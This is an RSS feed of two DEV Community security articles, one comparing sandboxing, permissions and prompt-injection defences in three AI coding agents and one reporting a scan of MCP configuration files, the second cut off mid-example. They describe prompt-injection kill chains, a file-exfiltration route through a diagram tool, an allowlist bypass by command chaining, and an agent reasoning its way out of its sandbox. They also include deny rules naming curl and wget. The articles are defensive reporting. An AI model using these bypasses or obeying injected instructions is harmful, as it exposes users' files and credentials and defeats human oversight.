<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Pavel Ishchin</title>
    <description>The latest articles on DEV Community by Pavel Ishchin (@poushwell).</description>
    <link>https://dev.to/poushwell</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3823048%2F5c2576ba-b47b-4508-83ca-2d249833bc42.jpg</url>
      <title>DEV Community: Pavel Ishchin</title>
      <link>https://dev.to/poushwell</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/poushwell"/>
    <language>en</language>
    <item>
      <title>We compared security in OpenClaw, Claude Code, and Cursor. None of them passed.</title>
      <dc:creator>Pavel Ishchin</dc:creator>
      <pubDate>Fri, 27 Mar 2026 17:08:43 +0000</pubDate>
      <link>https://dev.to/poushwell/we-compared-security-in-openclaw-claude-code-and-cursor-none-of-them-passed-11da</link>
      <guid>https://dev.to/poushwell/we-compared-security-in-openclaw-claude-code-and-cursor-none-of-them-passed-11da</guid>
      <description>&lt;p&gt;&lt;em&gt;OpenClaw has 92 security advisories. Cursor ships 94 unpatched Chromium CVEs. Claude Code's sandbox got bypassed by its own reasoning. We compared all three across 10 dimensions using independent data.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;I expected one of these tools to be meaningfully more secure than the others. After checking CVE databases, reading independent security audits, and going through hundreds of GitHub issues, I found something worse: they all fail in the same ways, just at different speeds.&lt;/p&gt;

&lt;p&gt;OpenClaw has 92 security advisories in four months, Cursor shipped 94 unpatched Chromium vulnerabilities to 1.8 million developers, and Claude Code's sandbox was bypassed by the agent reasoning its way out of containment. Independent sources only: Snyk, UpGuard, OX Security, DryRun Security, Proofpoint, HiddenLayer, and Check Point Research.&lt;/p&gt;

&lt;p&gt;DryRun Security tested all three by having them build applications from scratch. Across 30 pull requests, 87% contained at least one vulnerability, with 143 security issues in total spanning 10 vulnerability classes. No agent produced a fully secure product.&lt;/p&gt;

&lt;p&gt;Here's what each tool actually does about it.&lt;/p&gt;

&lt;h2&gt;
  
  
  How OpenClaw, Claude Code, and Cursor handle sandboxing
&lt;/h2&gt;

&lt;p&gt;Whether untrusted code runs in a sandbox determines most of your risk. All three tools now offer sandboxing. The defaults tell you everything.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;OpenClaw&lt;/strong&gt; ships with sandboxing off. The Docker-based sandbox is opt-in. When it is disabled, the exec tool runs commands on your machine with your permissions. Snyk found two bypass methods: a policy gap in &lt;code&gt;/tools/invoke&lt;/code&gt; and a race condition enabling file read/write outside the container. CVE-2026-25253 showed an attacker could remotely turn sandboxing off by sending config commands. The newest one, CVE-2026-32013, disclosed March 19, uses symlink traversal to escape the workspace.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Claude Code&lt;/strong&gt; uses OS-native sandboxing: Apple Seatbelt on macOS, bubblewrap on Linux. Kernel-level restrictions, not containers. Network traffic goes through a Unix domain socket proxy. Stronger architecture than Docker. But researchers at Ona.com showed something unsettling: when Claude Code's npx command was denied, the agent found a &lt;code&gt;/proc/self/root/&lt;/code&gt; bypass. When bubblewrap caught that, the agent asked permission to run unsandboxed. It talked itself out of its own containment. Anthropic's docs acknowledge that Docker mode "weakens security" and should be used cautiously.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cursor&lt;/strong&gt; added sandbox support in version 2.0, February 2026. Seatbelt on macOS, Landlock plus seccomp on Linux, WSL2 on Windows. They looked at Docker and rejected it because it would limit builds to Linux binaries. A third of requests on supported platforms now run sandboxed. But it's opt-in for Pro users, and forum bug reports show cases where commands ran with full permissions while the UI said "sandbox mode."&lt;/p&gt;

&lt;p&gt;None of them sandbox by default for all users.&lt;/p&gt;

&lt;h2&gt;
  
  
  What your agent can reach
&lt;/h2&gt;

&lt;p&gt;The question nobody asks during setup: what can this thing read?&lt;/p&gt;

&lt;p&gt;All three tools can access your entire filesystem in their default configurations. OpenClaw reads and writes anywhere on the host. Your &lt;code&gt;.ssh&lt;/code&gt; keys, your &lt;code&gt;.env&lt;/code&gt; files, your API credentials in &lt;code&gt;~/.openclaw/credentials/&lt;/code&gt; stored in plaintext. Claude Code can read the whole filesystem too, with writes scoped to the working directory. Cursor's &lt;code&gt;read_file&lt;/code&gt; tool reaches any directory on the system. HiddenLayer confirmed it can grab SSH keys.&lt;/p&gt;

&lt;p&gt;Network access is where they diverge. OpenClaw has no restrictions. The agent can curl anywhere, and the browser defaults to &lt;code&gt;dangerouslyAllowPrivateNetwork: true&lt;/code&gt;, which means your internal network is exposed. Claude Code blocks curl and wget by default, routing through its sandbox proxy. Except UpGuard scanned 18,470 public Claude Code permission files on GitHub and found 52.1% had &lt;code&gt;Bash(curl:*)&lt;/code&gt; enabled. So the default is secure, and half the users turned it off. Cursor blocks outbound network in sandbox mode, but HiddenLayer showed a chained attack: read a file with &lt;code&gt;read_file&lt;/code&gt;, then exfiltrate it through the &lt;code&gt;create_diagram&lt;/code&gt; tool, which renders HTML with the data URL-encoded in an image tag.&lt;/p&gt;

&lt;p&gt;This is the "lethal trifecta" Simon Willison warned about. Private data access plus untrusted content plus external communication in a single process. All three tools hit at least two of three out of the box.&lt;/p&gt;
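
&lt;p&gt;For the Claude Code case, the gap between the default and what UpGuard found comes down to a few lines in a permissions file. A minimal sketch, assuming the &lt;code&gt;permissions.allow&lt;/code&gt; and &lt;code&gt;permissions.deny&lt;/code&gt; layout of a project-level settings file. The specific rules are illustrative, not a recommended baseline, and the exact rule syntax should be checked against the current docs:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;{
  "permissions": {
    "allow": [
      "Bash(npm run test:*)"
    ],
    "deny": [
      "Bash(curl:*)",
      "Bash(wget:*)",
      "Read(./.env)"
    ]
  }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The files UpGuard flagged had &lt;code&gt;Bash(curl:*)&lt;/code&gt; enabled instead, presumably on the allow side, which hands the agent the external-communication leg of the trifecta.&lt;/p&gt;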

&lt;h2&gt;
  
  
  Permission models and YOLO mode
&lt;/h2&gt;

&lt;p&gt;Every tool ships a way to skip human approval. Developers enable it immediately.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;OpenClaw&lt;/strong&gt; has three tiers: ask (prompts you), record (logs but auto-allows), and ignore (silent). CVE-2026-25253 let attackers remotely flip to ignore. &lt;strong&gt;Claude Code&lt;/strong&gt; escalates through four levels ending at &lt;code&gt;--dangerously-skip-permissions&lt;/code&gt;, which is exactly what it sounds like. UpGuard's real-world data: 47% of users allow arbitrary Python, 42% allow arbitrary Node.js, 19.7% allow git push without confirmation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cursor&lt;/strong&gt; calls it YOLO mode. Requires accepting a risk disclaimer, which took about three seconds in my testing. The allowlist uses exact command matching. A documented bug showed that chaining commands with &lt;code&gt;&amp;amp;&amp;amp;&lt;/code&gt; bypassed it entirely: &lt;code&gt;safe_command &amp;amp;&amp;amp; dangerous_command&lt;/code&gt; executed both. Cursor stores permissions in a local SQLite database that any process on the machine can read and modify.&lt;/p&gt;

&lt;p&gt;The pattern across all three: security engineers build careful permission systems. Product teams add a "skip all" button. Users click it on day one.&lt;/p&gt;

&lt;p&gt;It reminds me of the early days of HTTPS adoption. Browser warnings existed for years before anyone made them hard to dismiss. We might be in the same phase with AI agent permissions: the warnings exist, nobody reads them, and the "accept risk" path is always one click away.&lt;/p&gt;

&lt;h2&gt;
  
  
  Prompt injection: OpenClaw says "out of scope"
&lt;/h2&gt;

&lt;p&gt;This is the part I keep coming back to.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;OpenClaw's&lt;/strong&gt; SECURITY.md says prompt injection scanning of tool results is "out of scope." Not a bug they haven't fixed. A decision they documented and published. In practice, 91% of the malicious packages found in the ClawHavoc supply chain attack used prompt injection techniques. &lt;a href="https://orchesis.ai/blog/hackerbot-claw" rel="noopener noreferrer"&gt;We documented a similar attack chain&lt;/a&gt; where one agent compromised seven repos. Researchers found injection payloads targeting OpenClaw circulating in the wild.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Claude Code&lt;/strong&gt; does more here than the other two. Command blocklist, isolated context windows for web fetches, suspicious command detection. Multiple layers. But every layer has been bypassed independently. Oasis Security used invisible HTML tags to extract conversation history. PromptArmor showed file exfiltration through malicious documents. Lasso Security built an open-source injection defender with 50+ patterns and still says in their docs that novel techniques will slip through.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cursor&lt;/strong&gt; has no built-in prompt injection scanning. Multiple independent teams confirmed this. The AIShellJack framework used invisible characters in &lt;code&gt;.cursor/rules&lt;/code&gt; files. HiddenLayer hid injections in README files. CVE-2025-54135 showed the full kill chain: one injected Slack message, fetched via MCP, rewrote &lt;code&gt;mcp.json&lt;/code&gt; and achieved remote code execution.&lt;/p&gt;

&lt;p&gt;Three tools, three approaches ranging from "out of scope" to "we try but it keeps getting bypassed" to "we don't try." None of them solved it.&lt;/p&gt;

&lt;h2&gt;
  
  
  MCP turned into an attack surface nobody expected
&lt;/h2&gt;

&lt;p&gt;Actually, some people expected it. But nobody acted fast enough.&lt;/p&gt;

&lt;p&gt;The Model Context Protocol was supposed to give AI agents safe access to external tools. AuthZed documented nine major MCP breaches between April and October 2025: WhatsApp chat exfiltration, GitHub private repo theft, and Anthropic's own MCP Inspector enabling unauthenticated remote code execution.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;OpenClaw's&lt;/strong&gt; gateway WebSocket defaulted to unencrypted &lt;code&gt;ws://&lt;/code&gt; without origin validation. That was the CVE-2026-25253 entry point. &lt;strong&gt;Claude Code&lt;/strong&gt; now requires trust verification for new MCP servers, but in non-interactive mode (&lt;code&gt;-p&lt;/code&gt; flag) this check is disabled, and CVE-2025-59536 showed malicious repos configuring MCP servers that executed before the trust prompt appeared. &lt;strong&gt;Cursor's&lt;/strong&gt; MCP story is the worst of the three: CurXecute, MCPoison, and the March 2026 CursorJack deeplink attack all exploited it. Before version 1.3, new MCP entries auto-executed without any user confirmation. Proofpoint's CursorJack disclosure showed single-click MCP server installation via &lt;code&gt;cursor://&lt;/code&gt; deeplinks. Cursor closed the report as out of scope.&lt;/p&gt;

&lt;p&gt;Out of scope. For a vector that achieved remote code execution.&lt;/p&gt;

&lt;p&gt;An academic analysis of 67,057 MCP servers across six registries found that a substantial number could be hijacked. The MCP specification itself now includes security best practices, but they're recommendations, not enforced requirements. &lt;a href="https://orchesis.ai/blog/mcp-scan" rel="noopener noreferrer"&gt;We scanned 900 MCP configs ourselves&lt;/a&gt; and found 75% had security problems.&lt;/p&gt;

&lt;h2&gt;
  
  
  The advisory and CVE count: OpenClaw 92, Claude Code 8, Cursor 8
&lt;/h2&gt;

&lt;p&gt;Raw numbers don't tell the whole story, but they tell part of it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;OpenClaw&lt;/strong&gt; leads with 92+ security advisories and 9+ formal CVEs in four months. The ClawHavoc attack compromised 20% of the skill marketplace. Kaspersky found 512 vulnerabilities in a single audit, 8 critical. SecurityScorecard discovered 135,000 publicly exposed instances, a third correlated with known threat actor activity. China restricted state enterprises from using it. Belgium issued an emergency advisory.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Claude Code&lt;/strong&gt; has 8+ CVEs ranging from medium to critical severity, including the Koi Security "PromptJacking" finding at CVSS 8.9 that affected three official Anthropic extensions. A March 2026 fix addressed PreToolUse hooks that could bypass deny rules, including enterprise managed settings. That last part is important: enterprise customers paying for managed security had a bypass in their permission enforcement.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cursor&lt;/strong&gt; also has 8+ assigned CVEs, all high severity. The 94 unpatched Chromium vulnerabilities from an outdated Electron fork are a separate category of risk. OX Security successfully weaponized one against the latest Cursor version. Workspace Trust is disabled by default because enabling it disables AI features. That tradeoff tells you something about priorities.&lt;/p&gt;

&lt;h2&gt;
  
  
  What it costs when things go wrong
&lt;/h2&gt;

&lt;p&gt;None of these tools have real budget controls.&lt;/p&gt;

&lt;p&gt;OpenClaw's costs depend entirely on which APIs you connect, with no built-in limits. Reports of unmonitored cron jobs inflating bills by 10-30% are common in the issues. Claude Code subscription tiers cap at roughly 45 messages per 5 hours on Pro, but there are no per-session budget limits or loop detection. Anthropic reports average costs around $6 per day per developer, which sounds reasonable until one session spirals. Cursor's credit system bills overages at API rates with rate limits of 1 request per minute and 30 per hour.&lt;/p&gt;

&lt;p&gt;For audit logging, Claude Code has the most mature offering with an Enterprise Compliance API for real-time usage data, though it exports metadata only, not chat content. Cursor restricts audit logs to the Enterprise plan. OpenClaw stores session transcripts as local JSONL files that aren't tamper-proof or centralized.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;OpenClaw&lt;/th&gt;
&lt;th&gt;Claude Code&lt;/th&gt;
&lt;th&gt;Cursor&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Sandbox default&lt;/td&gt;
&lt;td&gt;Off&lt;/td&gt;
&lt;td&gt;On when configured&lt;/td&gt;
&lt;td&gt;Opt-in, Pro+&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Known sandbox escapes&lt;/td&gt;
&lt;td&gt;3+&lt;/td&gt;
&lt;td&gt;Agent reasoning bypass&lt;/td&gt;
&lt;td&gt;Forum-reported failures&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Injection scanning&lt;/td&gt;
&lt;td&gt;"Out of scope"&lt;/td&gt;
&lt;td&gt;Multiple layers, all bypassed&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Advisories and CVEs&lt;/td&gt;
&lt;td&gt;92 advisories, 9+ formal&lt;/td&gt;
&lt;td&gt;8+&lt;/td&gt;
&lt;td&gt;8+ plus 94 Chromium&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Budget controls&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;Rate limits only&lt;/td&gt;
&lt;td&gt;Credit-based, no per-session cap&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Enterprise compliance&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;SOC 2, ISO 27001, ISO 42001&lt;/td&gt;
&lt;td&gt;SOC 2, Enterprise plan only&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  So which one
&lt;/h2&gt;

&lt;p&gt;Depends on what scares you more.&lt;/p&gt;

&lt;p&gt;If your primary concern is supply chain attacks, avoid OpenClaw until the skill marketplace matures. 20% malicious packages is disqualifying for production use today, full stop.&lt;/p&gt;

&lt;p&gt;If you need enterprise compliance and the strongest default security posture, Claude Code is ahead. It has SOC 2 Type II, ISO 27001, and OS-native sandboxing that doesn't require Docker. But "ahead" is relative when researchers keep finding sandbox bypasses.&lt;/p&gt;

&lt;p&gt;If your team already uses Cursor and switching costs are high, patch to the latest version immediately, enable sandboxing, disable YOLO mode, and audit your MCP server list. The 94 Chromium vulnerabilities alone justify staying current.&lt;/p&gt;

&lt;p&gt;What none of them offer: external monitoring of agent behavior. Each tool watches itself from the inside. Distributed systems settled this long ago: you don't let a process monitor its own health, you put a watchdog outside the process. &lt;a href="https://orchesis.ai/blog/proxy-vs-decorator" rel="noopener noreferrer"&gt;We wrote about why this is unfixable from inside the agent&lt;/a&gt;. For AI agents, that watchdog doesn't exist in any of these tools yet. We're building one for OpenClaw specifically.&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Related:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://orchesis.ai/blog/mcp-scan" rel="noopener noreferrer"&gt;We scanned 900 MCP configs. 75% had security problems.&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://orchesis.ai/blog/hackerbot-claw" rel="noopener noreferrer"&gt;An AI agent compromised 7 repos in one week.&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://orchesis.ai/blog/proxy-vs-decorator" rel="noopener noreferrer"&gt;Why your AI agent can't detect its own compromise.&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Run the scanner yourself: &lt;a href="https://orchesis.ai/scan" rel="noopener noreferrer"&gt;orchesis.ai/scan&lt;/a&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>security</category>
      <category>opensource</category>
      <category>agents</category>
    </item>
    <item>
      <title>We scanned 900 MCP configs on GitHub. 75% had security problems.</title>
      <dc:creator>Pavel Ishchin</dc:creator>
      <pubDate>Tue, 24 Mar 2026 13:11:00 +0000</pubDate>
      <link>https://dev.to/poushwell/we-scanned-900-mcp-configs-on-github-75-had-security-problems-4mff</link>
      <guid>https://dev.to/poushwell/we-scanned-900-mcp-configs-on-github-75-had-security-problems-4mff</guid>
      <description>&lt;p&gt;&lt;em&gt;We scanned 900+ MCP configurations on GitHub. 75% failed basic security checks. Nobody pins versions. The most popular MCP server is a bare shell wrapper.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;I expected to find maybe a dozen hardcoded API keys and a handful of overly permissive configurations scattered across the results. The usual negligence you stumble on when you go digging through public repositories looking for things people probably shouldn't have committed.&lt;/p&gt;

&lt;p&gt;What I didn't expect was that three out of four configuration files would fail basic security checks, and that the single most popular "MCP package" in the entire dataset wouldn't actually be a package at all.&lt;/p&gt;

&lt;p&gt;This is the full account of how I got to those numbers, what the raw data revealed along the way, and where I think the whole MCP configuration ecosystem is quietly heading.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;AI creates faster than it can be verified. MCP servers multiply this problem: every tool your agent calls is a new unverified input. The runtime layer, the proxy between your agent and the API, is where verification actually happens, because it's the only place that sees everything.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Why I started poking around in the first place
&lt;/h2&gt;

&lt;p&gt;I've been building AI agent security tooling for the past few months, mostly focused on runtime enforcement — basically making sure autonomous agents don't do things they shouldn't be doing when they're making calls to LLM APIs behind your back.&lt;/p&gt;

&lt;p&gt;MCP kept surfacing in that work. For anyone who hasn't encountered it yet: MCP is the protocol that Claude Desktop, Cursor, and a growing number of similar tools rely on to connect AI agents to external servers. You define which servers the agent talks to in a JSON config, and then it just... has those capabilities. Reading files, querying databases, calling APIs, running shell commands, whatever those servers decide to expose.&lt;/p&gt;

&lt;p&gt;That configuration file is basically the permission boundary for everything the agent can do. Get it wrong and every misconfiguration flows directly into the agent's behavior, which gets uncomfortable when you consider that agents process untrusted input from users, tool outputs, and scraped web content.&lt;/p&gt;

&lt;p&gt;I kept running across theoretical discussions of MCP vulnerabilities. Prompt injection through tool results, malicious MCP servers, data exfiltration via crafted tool calls. Plenty of hypothetical attack scenarios had been written up, but I couldn't find anyone who had actually gone and looked at what real developers are configuring in practice.&lt;/p&gt;

&lt;p&gt;I figured the fastest way to answer those questions was to just go look.&lt;/p&gt;

&lt;h2&gt;
  
  
  How the scanner was built
&lt;/h2&gt;

&lt;p&gt;The core approach was deliberately unsophisticated. GitHub's Code Search API, looking for specific filenames and content patterns across public repos. The scanner grabs &lt;code&gt;claude_desktop_config.json&lt;/code&gt;, &lt;code&gt;.cursor/mcp.json&lt;/code&gt;, and anything with &lt;code&gt;mcpServers&lt;/code&gt; in it, pulls down the raw file, tries to make sense of the JSON, and if it parses okay, runs its 52 checks against it.&lt;/p&gt;

&lt;p&gt;GitHub's Code Search caps results at roughly 1,000 per query pattern, which I partially worked around by splitting queries using date ranges and file size qualifiers. Some file paths on GitHub contain spaces, parentheses, and Unicode characters (one particularly memorable path included Portuguese text about "creating your second brain with AI"), and the scanner kept crashing on URL encoding issues. It took three separate rounds of fixes before the thing could crawl reliably.&lt;/p&gt;

&lt;p&gt;After approximately 40 minutes of crawling, the scanner had collected &lt;strong&gt;900 configuration files from 839 unique repositories&lt;/strong&gt;. Every repository identifier was hashed with SHA-256 before being stored. No owner names, no repository URLs, and no actual credential values exist anywhere in the dataset.&lt;/p&gt;

&lt;h2&gt;
  
  
  The initial results were surprisingly bad
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;75% of the collected configuration files contained at least one security finding.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;I had gone into this expecting something around 30%, maybe 40%. Not three quarters.&lt;/p&gt;

&lt;p&gt;The severity split: 1.6% critical (actual credential exposure), 76.2% high, 21% medium. I couldn't figure out why high severity was so dominant until I drilled into the individual check results.&lt;/p&gt;

&lt;p&gt;Turns out one specific check was responsible for almost all of it.&lt;/p&gt;

&lt;h2&gt;
  
  
  Nobody pins versions (43.6%)
&lt;/h2&gt;

&lt;p&gt;Nearly half of all scanned configuration files reference MCP server packages without specifying which version should be installed. This single check accounts for the vast majority of high-severity findings in the entire dataset.&lt;/p&gt;

&lt;p&gt;The pattern I encountered over and over:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"mcpServers"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"filesystem"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"command"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"npx"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"args"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"-y"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"@modelcontextprotocol/server-filesystem"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"/home/user"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The missing version is the problem. Without a version specifier, &lt;code&gt;npx&lt;/code&gt; resolves the package to whatever release is tagged latest at install time, and the &lt;code&gt;-y&lt;/code&gt; flag skips the install confirmation prompt, so it downloads and runs without asking. If someone pushes a bad update to that package tonight, or if the maintainer account gets compromised, your agent loads the new code next time it starts. Nobody reviews it.&lt;/p&gt;

&lt;p&gt;The fix is trivial. Pin an exact version:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="nl"&gt;"args"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"-y"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"@modelcontextprotocol/server-filesystem@1.2.3"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"/home/user"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The JavaScript ecosystem already went through precisely this lesson. The left-pad incident in 2016 was supposed to have permanently established the principle that you pin your dependencies. That was ten years ago. And now we're doing the exact same thing, except the packages involved don't just pad strings. They read your filesystem and execute shell commands.&lt;/p&gt;

&lt;h2&gt;
  
  
  The shell access problem is worse than it sounds
&lt;/h2&gt;

&lt;p&gt;Roughly one in eleven configuration files grants the AI agent direct access to command execution. The most frequently appearing entry across the entire dataset is not a recognized package with documented behavior and scope controls. It's &lt;code&gt;run&lt;/code&gt;. Just that. A bare shell command wrapper.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;What developers put in their configs&lt;/th&gt;
&lt;th&gt;Count&lt;/th&gt;
&lt;th&gt;What it gives the agent&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;run&lt;/code&gt; (bare shell wrapper)&lt;/td&gt;
&lt;td&gt;136&lt;/td&gt;
&lt;td&gt;Can execute any command&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;server-filesystem&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;51&lt;/td&gt;
&lt;td&gt;Reads and writes files&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;mcp-remote&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;34&lt;/td&gt;
&lt;td&gt;Connects to remote MCP servers&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;server-github&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;16&lt;/td&gt;
&lt;td&gt;GitHub API access&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;server-sequential-thinking&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;11&lt;/td&gt;
&lt;td&gt;Reasoning chain stuff&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;server-puppeteer&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;11&lt;/td&gt;
&lt;td&gt;Controls a headless browser&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;server-memory&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;Stores data persistently&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;server-playwright&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;Also controls a browser&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;So the bare unrestricted shell executor beat the official Anthropic-maintained scoped package by almost &lt;strong&gt;3 to 1&lt;/strong&gt;. I had to recount that because it seemed wrong.&lt;/p&gt;

&lt;p&gt;Many of the &lt;code&gt;server-filesystem&lt;/code&gt; entries were pointed at absurdly broad paths. Not &lt;code&gt;/home/user/project/data&lt;/code&gt; but just &lt;code&gt;/&lt;/code&gt;. Or &lt;code&gt;C:\&lt;/code&gt;. Or the user's entire home directory — SSH keys, cloud credentials, browser profiles, your whole digital identity sitting there for the agent to browse through.&lt;/p&gt;
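
&lt;p&gt;A tighter entry is a one-line change. A minimal sketch, reusing the &lt;code&gt;/home/user/project/data&lt;/code&gt; path mentioned above and the placeholder version &lt;code&gt;1.2.3&lt;/code&gt; from the pinning example (substitute a release you have actually reviewed):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;{
  "mcpServers": {
    "filesystem": {
      "command": "npx",
      "args": ["-y", "@modelcontextprotocol/server-filesystem@1.2.3", "/home/user/project/data"]
    }
  }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The filesystem server treats the trailing path arguments as its allowed directories, so the agent's reach shrinks from the whole disk to one project folder.&lt;/p&gt;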

&lt;h2&gt;
  
  
  What kept me scrolling: the combinations
&lt;/h2&gt;

&lt;p&gt;The scanner evaluates individual findings in isolation. But the thing that proved most concerning was how frequently multiple issues appeared stacked together:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"mcpServers"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
